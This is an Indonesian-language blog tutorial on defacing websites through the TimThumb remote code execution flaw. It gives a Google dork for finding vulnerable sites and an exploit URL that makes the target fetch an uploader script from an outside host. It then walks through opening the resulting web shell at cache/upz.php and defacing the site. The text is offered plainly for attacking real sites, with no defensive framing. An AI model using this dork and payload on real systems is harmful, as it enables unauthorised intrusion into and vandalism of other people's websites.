Tutorial Deface Dengan Cara Timthumb RCE

 

Kali ini admin ganteng mau share cara deface nih, yap Deface Dengan Cara Timthumb.

langsung aja bahan bahannya

DORK : inurl:timthumb.php?src=   [ SELEBIHNYA KEMBANGIN SENDIRI]

EXPLOIT :
?src=http://flickr.com.ehpet.net/uploader.php


1. search di google pke dork di atas, kalau vuln tandanya seperti ini

2. Lalu masukkan exploitnya, maka akan seperti ini

3. Lalu dimana letak shellnya?, buka yg gw tandain kotak wrna merah

4. Klo udh dibuka, maka akan muncul success seperti ini

5. Akses shellnya? oke lihat yg gw tandain kotak warna merah

yap ada tulisan cache/upz.php
Sekarang kita coba buka, dan hasilnyaa...

Damn, berhasil !!!

Oke tinggal kalian deface deh webnya

Oke sekian dulu tutorialnya

Terima kasih sudah berkunjung.....

Bagikan Artikel ini